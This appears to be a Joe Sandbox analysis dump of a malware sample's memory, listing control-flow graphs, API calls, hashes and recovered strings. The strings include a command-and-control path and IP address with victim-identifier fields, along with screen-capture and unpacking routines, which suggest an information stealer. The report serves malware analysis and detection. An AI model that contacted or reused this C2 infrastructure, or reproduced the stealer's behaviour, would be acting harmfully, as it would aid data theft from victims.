                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InformationProcessQuery
                                                              • String ID:
                                                              • API String ID: 1778838933-0
                                                              • Opcode ID: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                              • Instruction ID: 4c19edd8aa9c17fc0a78f2ac854e6ceab7ff99fd175543fb6d48c07bc42e7691
                                                              • Opcode Fuzzy Hash: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                              • Instruction Fuzzy Hash: B151B730F081359BCF248B5CAA8076DBAA5AB24315FA14517EB25E73B4C379DD81874B
                                                              APIs
                                                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC64), ref: 004245E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InformationThread
                                                              • String ID:
                                                              • API String ID: 4046476035-0
                                                              • Opcode ID: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                              • Instruction ID: e4e78e09ab512bb18b464cd4d2f873358ef8636b72ff0900b4d62f7f8a955cf4
                                                              • Opcode Fuzzy Hash: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                              • Instruction Fuzzy Hash: 372132B57046216BC7249E1CA84253EA6D4EBD8314F55593BFACBEF750D238CC809B87
                                                              APIs
                                                              • NtClose.NTDLL(F2E4C6A8,00000000), ref: 0042F21D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                              • Instruction ID: a368c7a5dfb214292b8ef9e9d0bae651ecd455d0456980d3106c0b1a917b6dbd
                                                              • Opcode Fuzzy Hash: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                              • Instruction Fuzzy Hash: 9DF06DB1900644DFD710DF99E989B5AFBF8EB48724F10C16AE4289B751D33C5844CF68
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                              • Instruction ID: c1995cbfc35cf923d3c3ea23a15c0124f92d8ae5a77ba2b7d44262ced24471db
                                                              • Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                              • Instruction Fuzzy Hash: AFE08C72912278EBCB15DB89C945D8AF3FCEB49B14B2500ABB501D3200C674EE04CBD4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                              • Instruction ID: 17c6e2c9dd4ac5a7344e966d1587fdb4c68b9ede7c11da59021095b760417012
                                                              • Opcode Fuzzy Hash: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                              • Instruction Fuzzy Hash: 09C08C7410098046EF298D10C271BA63364FBA2BCBF8005CEC4420BB46C66EAD8AD654

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 4991 42f625-42f644 4992 42f64a-42f652 4991->4992 4993 42f654-42f659 4992->4993 4994 42f69b-42f6a0 4992->4994 4997 42f713-42f718 4993->4997 4998 42f65f-42f664 4993->4998 4995 42f756-42f75b 4994->4995 4996 42f6a6-42f6ab 4994->4996 5001 42f761-42f766 4995->5001 5002 42f8a4-42f8a9 4995->5002 5003 42f811-42f816 4996->5003 5004 42f6b1-42f6b6 4996->5004 5005 42f850-42f855 4997->5005 5006 42f71e-42f723 4997->5006 4999 42f7ca-42f7cf 4998->4999 5000 42f66a-42f66f 4998->5000 5017 42f9b0-42f9b5 4999->5017 5018 42f7d5-42f7da 4999->5018 5007 42f675-42f67a 5000->5007 5008 42f8d8-42f8dd 5000->5008 5011 42f984-42f989 5001->5011 5012 42f76c-42f771 5001->5012 5019 42fa29-42fa2e 5002->5019 5020 42f8af-42f8b4 5002->5020 5009 42f81c-42f821 5003->5009 5010 42f9dd-42f9e2 5003->5010 5015 42f8fa-42f8ff 5004->5015 5016 42f6bc-42f6c1 5004->5016 5013 42f85b-42f860 5005->5013 5014 42fa0e-42fa13 5005->5014 5021 42f93b-42f940 5006->5021 5022 42f729-42f72e 5006->5022 5039 42f680-42f685 5007->5039 5040 42facb-42fad9 5007->5040 5023 42f8e3-42f8e8 5008->5023 5024 42fc27-42fc4a 5008->5024 5041 42f827-42f82c 5009->5041 5042 42fbe9-42fc18 call 42f625 call 430228 5009->5042 5043 42fce4-42fcef 5010->5043 5044 42f9e8-42f9ed 5010->5044 5033 42fca5-42fcc9 5011->5033 5034 42f98f-42f994 5011->5034 5029 42fd10-42fd17 5012->5029 5030 42f777-42f77c 5012->5030 5047 42f866-42f86b 5013->5047 5048 42fa75-42fa86 lstrcatW 5013->5048 5045 42fa19-42fa1e 5014->5045 5046 42faad-42fab4 5014->5046 5027 42fc57-42fc6c lstrcatW 5015->5027 5028 42f905-42f90a 5015->5028 5051 42faf7-42fb08 lstrcatW 5016->5051 5052 42f6c7-42f6cc 5016->5052 5037 42f9bb-42f9c0 5017->5037 5038 42fcd8-42fcdf 5017->5038 5035 42f7e0-42f7e5 5018->5035 5036 42fb7d-42fbad 5018->5036 5049 42fa34-42fa39 5019->5049 5050 42fab9-42fac6 5019->5050 5053 42f8ba-42f8bf 5020->5053 5054 42fa8b-42faa8 5020->5054 5031 42fc71-42fc96 5021->5031 5032 42f946-42f94b 5021->5032 5025 42f734-42f739 5022->5025 5026 42fb0d-42fb39 5022->5026 5023->4992 5057 42f8ee-42f8f5 5023->5057 5055 42fcd0-42fcd3 5024->5055 5084 42fc50-42fc55 5024->5084 5071 42fb49-42fb6c call 447047 lstrcatW 5025->5071 5072 42f73f-42f744 5025->5072 5026->5055 5075 42fb3f-42fb44 5026->5075 5027->4992 5028->4992 5058 42f910-42f91b call 40b129 5028->5058 5029->4992 5073 42f782-42f787 5030->5073 5074 42fb71-42fb78 5030->5074 5079 42fc9d-42fca0 5031->5079 5085 42fc98 5031->5085 5032->4992 5061 42f951-42f974 5032->5061 5033->5055 5056 42fccb 5033->5056 5034->4992 5062 42f99a-42f9ab lstrcatW 5034->5062 5076 42f7eb-42f7f0 5035->5076 5077 42fbbd-42fbd2 lstrcatW * 2 call 40b7bb 5035->5077 5078 42fbb3-42fbb8 5036->5078 5036->5079 5037->4992 5063 42f9c6-42f9d8 lstrcatW 5037->5063 5038->4992 5064 42f68b-42f690 5039->5064 5065 42fade-42fae7 5039->5065 5040->4992 5080 42f832-42f84b call 447047 5041->5080 5081 42fd1c-42fd21 5041->5081 5070 42fc1b-42fc22 5042->5070 5059 42fcf1-42fcf9 5043->5059 5060 42fcfb 5043->5060 5044->4992 5066 42f9f3-42fa09 5044->5066 5045->5060 5067 42fa24 5045->5067 5046->4992 5047->4992 5083 42f871-42f894 5047->5083 5048->4992 5049->4992 5068 42fa3f-42fa70 call 419e6b call 447a80 * 2 5049->5068 5050->4992 5051->4992 5069 42f6d2-42f6d7 5052->5069 5052->5070 5053->4992 5086 42f8c5-42f8d3 5053->5086 5054->4992 5055->4992 5056->5055 5057->4992 5103 42f920-42f936 5058->5103 5059->5029 5059->5060 5088 42fcfc 5060->5088 5061->5055 5090 42f97a-42f97f 5061->5090 5062->4992 5063->4992 5064->4992 5091 42f692-42f699 5064->5091 5065->5055 5095 42faed-42faf2 5065->5095 5066->4992 5067->4992 5068->4992 5069->4992 5093 42f6dd-42f703 5069->5093 5070->4992 5071->4992 5072->4992 5094 42f74a-42f751 5072->5094 5073->4992 5096 42f78d-42f7ba 5073->5096 5074->4992 5075->5055 5076->4992 5098 42f7f6-42f801 5076->5098 5109 42fbd7-42fbe4 5077->5109 5078->5079 5079->4992 5080->4992 5081->4992 5089 42fd27-42fd34 5081->5089 5083->5055 5102 42f89a-42f89f 5083->5102 5084->5055 5085->5079 5086->4992 5088->5088 5090->5055 5091->4992 5093->5055 5105 42f709-42f70e 5093->5105 5094->4992 5095->5055 5096->5079 5106 42f7c0-42f7c5 5096->5106 5098->5055 5108 42f807-42f80c 5098->5108 5102->5055 5103->4992 5105->5055 5106->5079 5108->5055 5109->4992
                                                              APIs
                                                              • lstrcatW.KERNEL32(?,?), ref: 0042F9A2
                                                              • lstrcatW.KERNEL32(?,?), ref: 0042F9CF
                                                              • lstrcatW.KERNEL32(?,0045E102), ref: 0042FA7D
                                                              • lstrcatW.KERNEL32(?,0045E102), ref: 0042FAFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat
                                                              • String ID: (lu$)lu$)lu$n_v$n_v$n_v
                                                              • API String ID: 4038537762-1534030094
                                                              • Opcode ID: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                              • Instruction ID: 4b57ba66ae2396d09571da8aec8c9542c80e7c55b9c92ca3ddc1ba6dd1b7a9a6
                                                              • Opcode Fuzzy Hash: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                              • Instruction Fuzzy Hash: 7AF11D71B0012E9BCF289F99E8515BEBAB4FB54310FE44537E401EA3B0D37989469B4B

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5808 41a28f-41a2c9 call 447e24 call 44568a 5813 41a2cc-41a2d4 5808->5813 5814 41a341-41a346 5813->5814 5815 41a2d6-41a2db 5813->5815 5816 41a34c-41a351 5814->5816 5817 41a40e-41a413 5814->5817 5818 41a2e1-41a2e6 5815->5818 5819 41a3c5-41a3ca 5815->5819 5820 41a357-41a35c 5816->5820 5821 41a4b8-41a4bd 5816->5821 5822 41a419-41a41e 5817->5822 5823 41a53a-41a53f 5817->5823 5824 41a458-41a45d 5818->5824 5825 41a2ec-41a2f1 5818->5825 5826 41a3d0-41a3d5 5819->5826 5827 41a4f7-41a4fc 5819->5827 5830 41a362-41a367 5820->5830 5831 41a5a5-41a5aa 5820->5831 5828 41a6a1-41a6a6 5821->5828 5829 41a4c3-41a4c8 5821->5829 5832 41a424-41a429 5822->5832 5833 41a5ed-41a5f2 5822->5833 5840 41a705-41a70a 5823->5840 5841 41a545-41a54a 5823->5841 5836 41a463-41a468 5824->5836 5837 41a635-41a63a 5824->5837 5838 41a2f7-41a2fc 5825->5838 5839 41a578-41a57d 5825->5839 5842 41a5cb-41a5d0 5826->5842 5843 41a3db-41a3e0 5826->5843 5834 41a502-41a507 5827->5834 5835 41a6c9-41a6ce 5827->5835 5852 41a992-41a999 5828->5852 5853 41a6ac-41a6b1 5828->5853 5846 41a80e-41a828 call 41c270 call 41f9a4 5829->5846 5847 41a4ce-41a4d3 5829->5847 5848 41a758-41a771 5830->5848 5849 41a36d-41a372 5830->5849 5866 41a5b0-41a5b5 5831->5866 5867 41a902-41a909 5831->5867 5864 41a7db-41a7e2 5832->5864 5865 41a42f-41a434 5832->5865 5874 41a951-41a970 5833->5874 5875 41a5f8-41a5fd 5833->5875 5850 41a50d-41a512 5834->5850 5851 41a85f-41a866 5834->5851 5856 41a6d4-41a6d9 5835->5856 5857 41a99e-41a9a9 call 447e24 5835->5857 5868 41a7e7-41a7ee 5836->5868 5869 41a46e-41a473 5836->5869 5844 41a640-41a645 5837->5844 5845 41a97f-41a98d 5837->5845 5872 41a302-41a307 5838->5872 5873 41a727-41a735 5838->5873 5860 41a583-41a588 5839->5860 5861 41aa24-41aa2b 5839->5861 5862 41a9c0-41a9cb 5840->5862 5863 41a710-41a715 5840->5863 5854 41a550-41a555 5841->5854 5855 41a886-41a89c call 41941d call 419473 5841->5855 5870 41a936-41a94c 5842->5870 5871 41a5d6-41a5db 5842->5871 5858 41a797-41a7bf 5843->5858 5859 41a3e6-41a3eb 5843->5859 5844->5813 5878 41a64b call 41d057 5844->5878 5845->5813 5948 41a82d-41a834 5846->5948 5893 41a839-41a85a 5847->5893 5894 41a4d9-41a4de 5847->5894 5848->5813 5879 41a776-41a787 5849->5879 5880 41a378-41a37d 5849->5880 5895 41a518-41a51d 5850->5895 5896 41a86b-41a876 5850->5896 5851->5813 5852->5813 5853->5813 5881 41a6b7-41a6c4 5853->5881 5898 41a8b6-41a8e6 5854->5898 5899 41a55b-41a560 5854->5899 5950 41a8a1-41a8b1 5855->5950 5856->5813 5882 41a6df-41a700 call 41b251 5856->5882 5934 41a9ae-41a9bb 5857->5934 5890 41a7c5-41a7ca 5858->5890 5891 41a977-41a97a 5858->5891 5883 41a3f1-41a3f6 5859->5883 5884 41a7cf-41a7d6 5859->5884 5900 41a8f6-41a8fd 5860->5900 5901 41a58e-41a593 5860->5901 5861->5813 5876 41a9cd-41a9d5 5862->5876 5877 41a9ec-41aa15 5862->5877 5863->5813 5885 41a71b-41a722 5863->5885 5864->5813 5886 41a9d7-41a9da 5865->5886 5887 41a43a-41a43f 5865->5887 5902 41a5bb-41a5c0 5866->5902 5903 41a90e-41a931 call 447e2f 5866->5903 5867->5813 5868->5813 5888 41a7f3-41a809 5869->5888 5889 41a479-41a47e 5869->5889 5870->5813 5905 41a5e1-41a5e8 5871->5905 5906 41aa30-41aa35 5871->5906 5907 41a73a-41a748 5872->5907 5908 41a30d-41a312 5872->5908 5873->5813 5874->5891 5904 41a972 5874->5904 5875->5813 5910 41a603-41a625 5875->5910 5876->5861 5876->5886 5913 41aa17 5877->5913 5914 41aa1c-41aa1f 5877->5914 5936 41a650-41a69c call 41aa49 * 3 5878->5936 5879->5891 5921 41a78d-41a792 5879->5921 5880->5813 5915 41a383-41a3b5 call 41592c call 41900a 5880->5915 5881->5813 5882->5813 5883->5813 5918 41a3fc-41a409 5883->5918 5884->5813 5885->5813 5912 41a9db 5886->5912 5887->5813 5919 41a445-41a453 5887->5919 5888->5813 5889->5813 5922 41a484-41a4a8 call 41604a 5889->5922 5890->5891 5891->5813 5893->5813 5894->5813 5924 41a4e4-41a4f2 5894->5924 5895->5813 5925 41a523-41a526 call 447a80 5895->5925 5896->5891 5926 41a87c-41a881 5896->5926 5898->5891 5929 41a8ec-41a8f1 5898->5929 5899->5813 5928 41a566-41a573 5899->5928 5900->5813 5901->5813 5930 41a599-41a5a0 5901->5930 5902->5877 5932 41a5c6 5902->5932 5903->5813 5904->5891 5905->5813 5906->5813 5916 41aa3b-41aa48 5906->5916 5907->5891 5920 41a74e-41a753 5907->5920 5908->5813 5933 41a314-41a331 5908->5933 5910->5891 5935 41a62b-41a630 5910->5935 5912->5912 5913->5914 5914->5813 5915->5891 5957 41a3bb-41a3c0 5915->5957 5918->5813 5919->5813 5920->5891 5921->5891 5922->5891 5953 41a4ae-41a4b3 5922->5953 5924->5813 5949 41a52b-41a535 5925->5949 5926->5891 5928->5813 5929->5891 5930->5813 5932->5813 5933->5891 5944 41a337-41a33c 5933->5944 5934->5813 5935->5891 5936->5813 5944->5891 5948->5813 5949->5813 5950->5813 5953->5891 5957->5891
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wctomb_s
                                                              • String ID: /c2sock$94.158.244.69$GhYuIq$file$hwid$lid$pid
                                                              • API String ID: 2865277502-1332857675
                                                              • Opcode ID: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                              • Instruction ID: cc35308ceb474d8d45e9bf1619109491d7752d3a10985d79ac983763bc7ee506
                                                              • Opcode Fuzzy Hash: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                              • Instruction Fuzzy Hash: 11F108B5D0211A9BDF248B88C8455FEBAB1AB14340F24496BE415F7394D33DCAE18B9F

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6109 88003c-880047 6110 880049 6109->6110 6111 88004c-880263 call 880a3f call 880e0f call 880d90 VirtualAlloc 6109->6111 6110->6111 6126 88028b-880292 6111->6126 6127 880265-880289 call 880a69 6111->6127 6129 8802a1-8802b0 6126->6129 6130 8802ce-8803c2 VirtualProtect call 880cce call 880ce7 6127->6130 6129->6130 6131 8802b2-8802cc 6129->6131 6138 8803d1-8803e0 6130->6138 6131->6129 6139 880439-8804b8 VirtualFree 6138->6139 6140 8803e2-880437 call 880ce7 6138->6140 6142 8804be-8804cd 6139->6142 6143 8805f4-8805fe 6139->6143 6140->6138 6145 8804d3-8804dd 6142->6145 6146 88077f-880789 6143->6146 6147 880604-88060d 6143->6147 6145->6143 6152 8804e3-880505 LoadLibraryA 6145->6152 6150 88078b-8807a3 6146->6150 6151 8807a6-8807b0 6146->6151 6147->6146 6148 880613-880637 6147->6148 6153 88063e-880648 6148->6153 6150->6151 6154 88086e-8808be LoadLibraryA 6151->6154 6155 8807b6-8807cb 6151->6155 6156 880517-880520 6152->6156 6157 880507-880515 6152->6157 6153->6146 6160 88064e-88065a 6153->6160 6165 8808c7-8808f9 6154->6165 6158 8807d2-8807d5 6155->6158 6159 880526-880547 6156->6159 6157->6159 6161 880824-880833 6158->6161 6162 8807d7-8807e0 6158->6162 6163 88054d-880550 6159->6163 6160->6146 6164 880660-88066a 6160->6164 6171 880839-88083c 6161->6171 6166 8807e2 6162->6166 6167 8807e4-880822 6162->6167 6168 8805e0-8805ef 6163->6168 6169 880556-88056b 6163->6169 6170 88067a-880689 6164->6170 6172 8808fb-880901 6165->6172 6173 880902-88091d 6165->6173 6166->6161 6167->6158 6168->6145 6174 88056d 6169->6174 6175 88056f-88057a 6169->6175 6176 88068f-8806b2 6170->6176 6177 880750-88077a 6170->6177 6171->6154 6178 88083e-880847 6171->6178 6172->6173 6174->6168 6180 88059b-8805bb 6175->6180 6181 88057c-880599 6175->6181 6182 8806ef-8806fc 6176->6182 6183 8806b4-8806ed 6176->6183 6177->6153 6184 880849 6178->6184 6185 88084b-88086c 6178->6185 6192 8805bd-8805db 6180->6192 6181->6192 6186 88074b 6182->6186 6187 8806fe-880748 6182->6187 6183->6182 6184->6154 6185->6171 6186->6170 6187->6186 6192->6163
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0088024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: aac36b1d1735d88017c5ffbfa41392513043c77e30cf763340a148cb817e5263
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: 3D527974A01229DFDBA4DF58C984BA8BBB1BF09304F1480D9E50DAB351DB30AE88DF15

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6334 432718-43272b 6335 43272e-432736 6334->6335 6336 432771-432776 6335->6336 6337 432738-43273d 6335->6337 6338 432821-432826 6336->6338 6339 43277c-432781 6336->6339 6340 432743-432748 6337->6340 6341 4327f0-4327f5 6337->6341 6342 432910-432915 6338->6342 6343 43282c-432831 6338->6343 6344 432787-43278c 6339->6344 6345 4328a9-4328ae 6339->6345 6346 432872-432877 6340->6346 6347 43274e-432753 6340->6347 6348 4327fb-432800 6341->6348 6349 4328e9-4328ee 6341->6349 6356 432ae4-432aeb 6342->6356 6357 43291b-432920 6342->6357 6350 432837-43283c 6343->6350 6351 432a26-432a52 BitBlt 6343->6351 6352 432792-432797 6344->6352 6353 4329d8-4329eb 6344->6353 6364 4328b0-4328b5 6345->6364 6365 4328d6-4328e4 6345->6365 6358 432a76-432a8d CreateCompatibleBitmap 6346->6358 6359 43287d-432882 6346->6359 6360 432979-43298f 6347->6360 6361 432759-43275e 6347->6361 6362 432806-43280b 6348->6362 6363 4329fc-432a09 6348->6363 6354 4328f4-4328f9 6349->6354 6355 432ace-432adf 6349->6355 6372 432842-432847 6350->6372 6373 432a5b-432a71 SelectObject 6350->6373 6374 432ac6-432ac9 6351->6374 6375 432a54-432a59 6351->6375 6366 4329f0-4329f7 6352->6366 6367 43279d-4327a2 6352->6367 6353->6335 6354->6335 6368 4328ff-43290b 6354->6368 6355->6335 6356->6335 6357->6335 6369 432926-432934 6357->6369 6358->6335 6376 432a92-432abf call 4338b5 call 43350d 6359->6376 6377 432888-43288d 6359->6377 6360->6335 6378 432994-4329d3 call 430e6c * 2 6361->6378 6379 432764-432769 6361->6379 6370 432811-432816 6362->6370 6371 432a0e-432a21 SelectObject 6362->6371 6363->6335 6380 432af0-432af5 6364->6380 6381 4328bb-4328c6 6364->6381 6365->6335 6366->6335 6367->6335 6384 4327a4-4327e0 call 4338b5 call 432718 6367->6384 6368->6335 6386 432936 6369->6386 6387 43293b-43293e 6369->6387 6388 43295b-432974 6370->6388 6389 43281c 6370->6389 6371->6335 6372->6335 6391 43284d-432863 call 432b1b 6372->6391 6373->6335 6374->6335 6375->6374 6376->6374 6409 432ac1 6376->6409 6377->6335 6393 432893-4328a4 CreateCompatibleDC 6377->6393 6378->6335 6382 432943-432946 6379->6382 6394 43276f 6379->6394 6380->6335 6385 432afb-432b1a DeleteDC DeleteObject 6380->6385 6381->6382 6383 4328c8-4328d0 6381->6383 6396 432947 6382->6396 6383->6365 6383->6388 6384->6374 6411 4327e6-4327eb 6384->6411 6386->6387 6387->6374 6388->6335 6389->6335 6406 432865 6391->6406 6407 43286a-43286d 6391->6407 6393->6335 6394->6335 6396->6396 6406->6407 6407->6374 6409->6374 6411->6374
                                                              APIs
                                                              • CreateCompatibleDC.GDI32(00000D62), ref: 00432894
                                                              • DeleteDC.GDI32(00000002), ref: 00432B01
                                                              • DeleteObject.GDI32(?), ref: 00432B0A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Delete$CompatibleCreateObject
                                                              • String ID:
                                                              • API String ID: 1022343127-0
                                                              • Opcode ID: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                              • Instruction ID: 50fedbdf880eafc0b33480be7e0390951b775b57d16ab65b209ae7f2f2027e24
                                                              • Opcode Fuzzy Hash: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                              • Instruction Fuzzy Hash: 358116B590031A9BDF209F948EC557E7A74BB0C350F282617E510F63A0D3FD9A419BAB

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6412 44cf15-44cf21 6413 44cfb3-44cfb6 6412->6413 6414 44cf26-44cf37 6413->6414 6415 44cfbc 6413->6415 6417 44cf44-44cf5d LoadLibraryExW 6414->6417 6418 44cf39-44cf3c 6414->6418 6416 44cfbe-44cfc2 6415->6416 6421 44cfc3-44cfd3 6417->6421 6422 44cf5f-44cf68 GetLastError 6417->6422 6419 44cf42 6418->6419 6420 44cfdc-44cfde 6418->6420 6424 44cfb0 6419->6424 6420->6416 6421->6420 6423 44cfd5-44cfd6 FreeLibrary 6421->6423 6425 44cfa1-44cfae 6422->6425 6426 44cf6a-44cf7c call 4516ce 6422->6426 6423->6420 6424->6413 6425->6424 6426->6425 6429 44cf7e-44cf90 call 4516ce 6426->6429 6429->6425 6432 44cf92-44cf9f LoadLibraryExW 6429->6432 6432->6421 6432->6425
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,0044D022,?,00426F52,00000000,00000000,?,?,0044CDD6,00000021,FlsSetValue,0046503C,FlsSetValue,00000000), ref: 0044CFD6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3664257935-537541572
                                                              • Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                              • Instruction ID: c6a9518bbc4403065455c8dc6532f837efe444071a0c6fa5154c8577c36c6d79
                                                              • Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                              • Instruction Fuzzy Hash: 4521EE31E47210ABEB219B65DCC0A5B77699B41764B190122FD05A73D0FBBCDD08C6DD

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6676 44575f-445778 6678 44578d-44579d 6676->6678 6679 44577a-44578b call 4447a4 call 44e2f7 6676->6679 6680 4457b2-4457b8 6678->6680 6681 44579f-4457b0 call 4447a4 call 44e2f7 6678->6681 6698 4457e0-4457e2 6679->6698 6684 4457c0-4457c6 6680->6684 6685 4457ba 6680->6685 6704 4457df 6681->6704 6690 4457e3 call 453aae 6684->6690 6691 4457c8 6684->6691 6688 4457d2-4457dc call 4447a4 6685->6688 6689 4457bc-4457be 6685->6689 6702 4457de 6688->6702 6689->6684 6689->6688 6699 4457e8-4457fd call 453711 6690->6699 6691->6688 6696 4457ca-4457d0 6691->6696 6696->6688 6696->6690 6706 445803-44580f call 45373d 6699->6706 6707 4459ee-4459f8 call 44e307 6699->6707 6702->6704 6704->6698 6706->6707 6712 445815-445821 call 453769 6706->6712 6712->6707 6715 445827-44583c 6712->6715 6716 4458ac-4458b7 call 4537d0 6715->6716 6717 44583e 6715->6717 6716->6702 6724 4458bd-4458c8 6716->6724 6718 445840-445846 6717->6718 6719 445848-445864 call 4537d0 6717->6719 6718->6716 6718->6719 6719->6702 6727 44586a-44586d 6719->6727 6725 4458e4 6724->6725 6726 4458ca-4458d3 call 453a5a 6724->6726 6729 4458e7-4458fb call 4543d0 6725->6729 6726->6725 6735 4458d5-4458e2 6726->6735 6730 4459e7-4459e9 6727->6730 6731 445873-44587c call 453a5a 6727->6731 6738 4458fd-445905 6729->6738 6739 445908-44592f call 4527e0 call 4543d0 6729->6739 6730->6702 6731->6730 6740 445882-44589a call 4537d0 6731->6740 6735->6729 6738->6739 6748 445931-44593a 6739->6748 6749 44593d-445964 call 4527e0 call 4543d0 6739->6749 6740->6702 6745 4458a0-4458a7 6740->6745 6745->6730 6748->6749 6754 445966-44596f 6749->6754 6755 445972-445981 call 4527e0 6749->6755 6754->6755 6758 445983 6755->6758 6759 4459a9-4459c7 6755->6759 6760 445985-445987 6758->6760 6761 445989-44599d 6758->6761 6762 4459e4 6759->6762 6763 4459c9-4459e2 6759->6763 6760->6761 6764 44599f-4459a1 6760->6764 6761->6730 6762->6730 6763->6730 6764->6730 6765 4459a3 6764->6765 6765->6759 6766 4459a5-4459a7 6765->6766 6766->6730 6766->6759
                                                              APIs
                                                              • __allrem.LIBCMT ref: 004458F2
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044590E
                                                              • __allrem.LIBCMT ref: 00445925
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445943
                                                              • __allrem.LIBCMT ref: 0044595A
